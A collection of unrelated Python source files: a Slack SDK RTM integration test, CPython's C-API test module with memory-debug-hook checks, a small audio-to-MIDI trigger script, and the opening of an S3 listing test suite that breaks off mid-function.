| source | python |
|---|---|
test_issue_631.py
|
import asyncio
import collections
import logging
import os
import threading
import time
import traceback
import unittest
import pytest
from integration_tests.env_variable_names import (
SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN,
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID,
)
from integration_tests.helpers import async_test, is_not_specified
from slack_sdk.rtm import RTMClient
from slack_sdk.web import WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slack-sdk/issues/631
"""
def setUp(self):
if not hasattr(self, "logger"):
self.logger = logging.getLogger(__name__)
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
# Stop the Client
if hasattr(self, "rtm_client") and not self.rtm_client._stopped:
self.rtm_client.stop()
@pytest.mark.skipif(
condition=is_not_specified(), reason="to avoid rate_limited errors"
)
def test_issue_631_sharing_event_loop(self):
self.success = None
self.text = "This message was sent to verify issue #631"
self.rtm_client = RTMClient(
token=self.bot_token,
run_async=False,
            loop=asyncio.new_event_loop(),  # TODO: the test does not work without explicitly passing a new event loop here
)
# @RTMClient.run_on(event="message")
# def send_reply(**payload):
# self.logger.debug(payload)
# data = payload['data']
# web_client = payload['web_client']
# web_client._event_loop = self.loop
# # Maybe you will also need the following line uncommented
# # web_client.run_async = True
#
# if self.text in data['text']:
# channel_id = data['channel']
# thread_ts = data['ts']
# try:
# self.success = web_client.chat_postMessage(
# channel=channel_id,
# text="Thanks!",
# thread_ts=thread_ts
# )
# except Exception as e:
# # slack.rtm.client:client.py:446 When calling '#send_reply()'
# # in the 'test_rtm_client' module the following error was raised: This event loop is already running
# self.logger.error(traceback.format_exc())
# raise e
# Solution (1) for #631
@RTMClient.run_on(event="message")
def send_reply(**payload):
self.logger.debug(payload)
data = payload["data"]
web_client = payload["web_client"]
try:
if "text" in data and self.text in data["text"]:
channel_id = data["channel"]
thread_ts = data["ts"]
self.success = web_client.chat_postMessage(
channel=channel_id, text="Thanks!", thread_ts=thread_ts
)
except Exception as e:
self.logger.error(traceback.format_exc())
raise e
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
        t.daemon = True
t.start()
try:
self.assertIsNone(self.success)
time.sleep(5)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
)
new_message = self.web_client.chat_postMessage(
channel=self.channel_id, text=self.text
)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertIsNotNone(self.success)
finally:
t.join(0.3)
# Solution (2) for #631
@pytest.mark.skipif(
condition=is_not_specified(), reason="this is just for reference"
)
@async_test
async def test_issue_631_sharing_event_loop_async(self):
self.success = None
self.text = "This message was sent to verify issue #631"
# To make run_async=True, the test method needs to be an async function + @async_test decorator
self.rtm_client = RTMClient(token=self.bot_token, run_async=True)
self.web_client = WebClient(token=self.bot_token, run_async=True)
@RTMClient.run_on(event="message")
async def send_reply(**payload):
self.logger.debug(payload)
data = payload["data"]
web_client = payload["web_client"]
try:
if "text" in data and self.text in data["text"]:
channel_id = data["channel"]
thread_ts = data["ts"]
self.success = await web_client.chat_postMessage(
channel=channel_id, text="Thanks!", thread_ts=thread_ts
)
except Exception as e:
self.logger.error(traceback.format_exc())
raise e
# intentionally not waiting here
self.rtm_client.start()
self.assertIsNone(self.success)
await asyncio.sleep(5)
self.web_client = WebClient(
token=self.bot_token,
run_async=True, # all need to be async here
)
new_message = await self.web_client.chat_postMessage(
channel=self.channel_id, text=self.text
)
self.assertFalse("error" in new_message)
await asyncio.sleep(5)
self.assertIsNotNone(self.success)
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
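# _testcapi.instancemethod() wraps a callable in PyInstanceMethod_Type: looked up on an
# instance it binds like a normal method, while class-level access returns the wrapped
# function itself, which is what the assertions in test_instancemethod below check.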
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
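# The pending-calls tests drive Py_AddPendingCall() through _testcapi._pending_threadfunc():
# callbacks submitted from worker threads must eventually run on the main thread while it
# busy-loops in pendingcalls_wait().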
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
        # now, stick around until len(l) has grown to n
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
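# Run a snippet in a fresh subinterpreter and check that it gets its own sys.modules and
# builtins objects (their ids differ from the main interpreter's).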
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
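# Re-export every test_* function defined by the _testcapi extension module itself
# (except the *_code helpers) as a method of this TestCase so unittest runs them.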
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfb\n"
r" at tail\+2: 0xfb\n"
r" .*\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
compiled1.py
|
import pyaudio
import numpy
import matplotlib.pyplot as plt
from threading import Thread
import matplotlib.animation as animation
print "11111111"
import rtmidi_python as rtmidi
import time
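# Rough audio-to-MIDI trigger: read microphone chunks, track a sliding 50-sample peak
# envelope, and when the level stays above 20000 for long enough, play the next note of
# the melody h over MIDI while appending the peak to the matplotlib axes via update().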
fig = plt.figure();
ax1 = fig.add_subplot(1,1,1)
xar = [];
yar = [];
def update(y):
xar.append(time.time());
yar.append(y);
ax1.plot(xar,yar);
c4=0x30
d4=0x32
e4=0x34
f4=0x35
g4=0x37
b4=0x3B
c5=0x3C
d5=0x3E
e5=0x40
f5=0x41
g5=0x43
a5=0x45
b5=0x47
c6=0x48
on=0x90
off=0x80
vel=100
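# Play a single note: send a note-on message, hold it for 0.5 s, then send note-off.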
def msg (note):
midi_out.send_message([on,note,vel])
time.sleep(0.5)
midi_out.send_message([off,note,vel])
midi_out = rtmidi.MidiOut()
midi_out.open_port(0)
h=[c4,c4,d4,c4,f4,e4,c4,c4,d4,c4,g4,f4,c4,c4]
#midi_out.send_message([0x80, 48, 100])
RATE=16000
RECORD_SECONDS = 10
CHUNKSIZE = 1024
peakinfo = 0;
flag = 0;
trigger = 0;
# initialize portaudio
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paInt16, channels=1, rate=RATE, input=True, frames_per_buffer=CHUNKSIZE, input_device_index=0)
envelope = [] # A python-list of chunks(numpy.ndarray)
recording = []
mem = []
peakinfo=0
flag=0
trigger=0
update(0);
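# Main capture loop: for each audio chunk, keep mem as the absolute values of the most
# recent 50 samples, count windows whose peak exceeds 20000, and after more than 30 of
# them fire the next note of h on a background thread; the count and trigger flag reset
# once the peak falls below 5000.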
for num in range(0, int(RATE / CHUNKSIZE * RECORD_SECONDS)):
data = stream.read(CHUNKSIZE)
chunk=numpy.fromstring(data, dtype=numpy.int16)
frame=chunk.tolist();
if (num==0):
for i in range(0,50):
recording.append(abs(frame[i]));
for i in range(50,1024):
for k in range(i-50,i):
mem.append(abs(frame[k]))
recording.append(max(mem))
if(max(mem)>20000):
peakinfo=peakinfo+1;
#print peakinfo
if((peakinfo>30)and(flag==0)):
flag=1;
trigger=trigger+1;
#msg(h[trigger-1])
update(max(mem));
msgthread=Thread(target=msg,args=(h[trigger-1],))
msgthread.start()
print trigger;
if(max(mem)<5000):
peakinfo=0
flag=0
del mem[:]
mem=frame[974:1024];
for i in range(len(mem)-1):
mem[i]=abs(mem[i]);
else:
for i in range(0,1024):
recording.append(max(mem));
if(max(mem)>20000):
peakinfo=peakinfo+1;
if((peakinfo>30)and(flag==0)):
flag=1;
trigger=trigger+1;
#msg(h[trigger-1])
update(max(mem));
msgthread=Thread(target=msg,args=(h[trigger-1],))
msgthread.start()
print trigger;
if(max(mem)<5000):
peakinfo=0
flag=0
del mem[0]
mem.append(abs(chunk[i]))
#Convert the list of numpy-arrays into a 1D array (column-wise)
#numpydata = numpy.hstack(frames)
#plt.plot(recording);
#plt.show();
# close stream
stream.stop_stream()
stream.close()
p.terminate()
|
test_s3.py
|
import boto3
import botocore.session
from botocore.exceptions import ClientError
from botocore.exceptions import ParamValidationError
from nose.tools import eq_ as eq
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import isodate
import email.utils
import datetime
import threading
import re
import pytz
from collections import OrderedDict
import requests
import json
import base64
import hmac
import hashlib
import xml.etree.ElementTree as ET
import time
import operator
import nose
import os
import string
import random
import socket
import dateutil.parser
import ssl
from collections import namedtuple
from email.header import decode_header
from .utils import assert_raises
from .utils import generate_random
from .utils import _get_status_and_error_code
from .utils import _get_status
from .policy import Policy, Statement, make_json_policy
from . import (
get_client,
get_prefix,
get_unauthenticated_client,
get_bad_auth_client,
get_v2_client,
get_new_bucket,
get_new_bucket_name,
get_new_bucket_resource,
get_config_is_secure,
get_config_host,
get_config_port,
get_config_endpoint,
get_config_ssl_verify,
get_main_aws_access_key,
get_main_aws_secret_key,
get_main_display_name,
get_main_user_id,
get_main_email,
get_main_api_name,
get_alt_aws_access_key,
get_alt_aws_secret_key,
get_alt_display_name,
get_alt_user_id,
get_alt_email,
get_alt_client,
get_tenant_client,
get_tenant_iam_client,
get_tenant_user_id,
get_buckets_list,
get_objects_list,
get_main_kms_keyid,
get_secondary_kms_keyid,
get_svc_client,
nuke_prefixed_buckets,
)
def _bucket_is_empty(bucket):
is_empty = True
for obj in bucket.objects.all():
is_empty = False
break
return is_empty
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='empty buckets return no contents')
def test_bucket_list_empty():
bucket = get_new_bucket_resource()
is_empty = _bucket_is_empty(bucket)
eq(is_empty, True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='distinct buckets have different contents')
def test_bucket_list_distinct():
bucket1 = get_new_bucket_resource()
bucket2 = get_new_bucket_resource()
obj = bucket1.put_object(Body='str', Key='asdf')
is_empty = _bucket_is_empty(bucket2)
eq(is_empty, True)
def _create_objects(bucket=None, bucket_name=None, keys=[]):
"""
Populate a (specified or new) bucket with objects with
specified names (and contents identical to their names).
"""
if bucket_name is None:
bucket_name = get_new_bucket_name()
if bucket is None:
bucket = get_new_bucket_resource(name=bucket_name)
for key in keys:
obj = bucket.put_object(Body=key, Key=key)
return bucket_name
def _get_keys(response):
"""
    return the list of object key strings from a client.list_objects() response
"""
keys = []
if 'Contents' in response:
objects_list = response['Contents']
keys = [obj['Key'] for obj in objects_list]
return keys
def _get_prefixes(response):
"""
    return the list of prefix strings from a client.list_objects() response
"""
prefixes = []
if 'CommonPrefixes' in response:
prefix_list = response['CommonPrefixes']
prefixes = [prefix['Prefix'] for prefix in prefix_list]
return prefixes
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/max_keys=2, no marker')
def test_bucket_list_many():
bucket_name = _create_objects(keys=['foo', 'bar', 'baz'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, MaxKeys=2)
keys = _get_keys(response)
eq(len(keys), 2)
eq(keys, ['bar', 'baz'])
eq(response['IsTruncated'], True)
response = client.list_objects(Bucket=bucket_name, Marker='baz',MaxKeys=2)
keys = _get_keys(response)
eq(len(keys), 1)
eq(response['IsTruncated'], False)
eq(keys, ['foo'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/max_keys=2, no marker')
@attr('list-objects-v2')
def test_bucket_listv2_many():
bucket_name = _create_objects(keys=['foo', 'bar', 'baz'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=2)
keys = _get_keys(response)
eq(len(keys), 2)
eq(keys, ['bar', 'baz'])
eq(response['IsTruncated'], True)
response = client.list_objects_v2(Bucket=bucket_name, StartAfter='baz',MaxKeys=2)
keys = _get_keys(response)
eq(len(keys), 1)
eq(response['IsTruncated'], False)
eq(keys, ['foo'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='keycount in listobjectsv2')
@attr('list-objects-v2')
def test_basic_key_count():
client = get_client()
bucket_names = []
bucket_name = get_new_bucket_name()
client.create_bucket(Bucket=bucket_name)
for j in range(5):
client.put_object(Bucket=bucket_name, Key=str(j))
response1 = client.list_objects_v2(Bucket=bucket_name)
eq(response1['KeyCount'], 5)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes in multi-component object names')
def test_bucket_list_delimiter_basic():
bucket_name = _create_objects(keys=['foo/bar', 'foo/bar/xyzzy', 'quux/thud', 'asdf'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
eq(keys, ['asdf'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
eq(prefixes, ['foo/', 'quux/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes in multi-component object names')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_basic():
bucket_name = _create_objects(keys=['foo/bar', 'foo/bar/xyzzy', 'quux/thud', 'asdf'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
eq(keys, ['asdf'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
eq(prefixes, ['foo/', 'quux/'])
eq(response['KeyCount'], len(prefixes) + len(keys))
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='test url encoding')
@attr('list-objects-v2')
def test_bucket_listv2_encoding_basic():
bucket_name = _create_objects(keys=['foo+1/bar', 'foo/bar/xyzzy', 'quux ab/thud', 'asdf+b'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='/', EncodingType='url')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
eq(keys, ['asdf%2Bb'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 3)
eq(prefixes, ['foo%2B1/', 'foo/', 'quux%20ab/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='test url encoding')
@attr('list-objects')
def test_bucket_list_encoding_basic():
bucket_name = _create_objects(keys=['foo+1/bar', 'foo/bar/xyzzy', 'quux ab/thud', 'asdf+b'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/', EncodingType='url')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
eq(keys, ['asdf%2Bb'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 3)
eq(prefixes, ['foo%2B1/', 'foo/', 'quux%20ab/'])
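# Helper for the V1 listing tests: fetch one page with the given prefix/delimiter/marker/
# max-keys, assert the returned keys, common prefixes, truncation flag and NextMarker,
# and return NextMarker so callers can walk the pages.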
def validate_bucket_list(bucket_name, prefix, delimiter, marker, max_keys,
is_truncated, check_objs, check_prefixes, next_marker):
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter=delimiter, Marker=marker, MaxKeys=max_keys, Prefix=prefix)
eq(response['IsTruncated'], is_truncated)
if 'NextMarker' not in response:
response['NextMarker'] = None
eq(response['NextMarker'], next_marker)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(len(keys), len(check_objs))
eq(len(prefixes), len(check_prefixes))
eq(keys, check_objs)
eq(prefixes, check_prefixes)
return response['NextMarker']
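# V2 counterpart of validate_bucket_list(): paginate with ContinuationToken (StartAfter=''
# on the first page), assert keys/prefixes/IsTruncated, and return NextContinuationToken.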
def validate_bucket_listv2(bucket_name, prefix, delimiter, continuation_token, max_keys,
is_truncated, check_objs, check_prefixes, last=False):
client = get_client()
params = dict(Bucket=bucket_name, Delimiter=delimiter, MaxKeys=max_keys, Prefix=prefix)
if continuation_token is not None:
params['ContinuationToken'] = continuation_token
else:
params['StartAfter'] = ''
response = client.list_objects_v2(**params)
eq(response['IsTruncated'], is_truncated)
if 'NextContinuationToken' not in response:
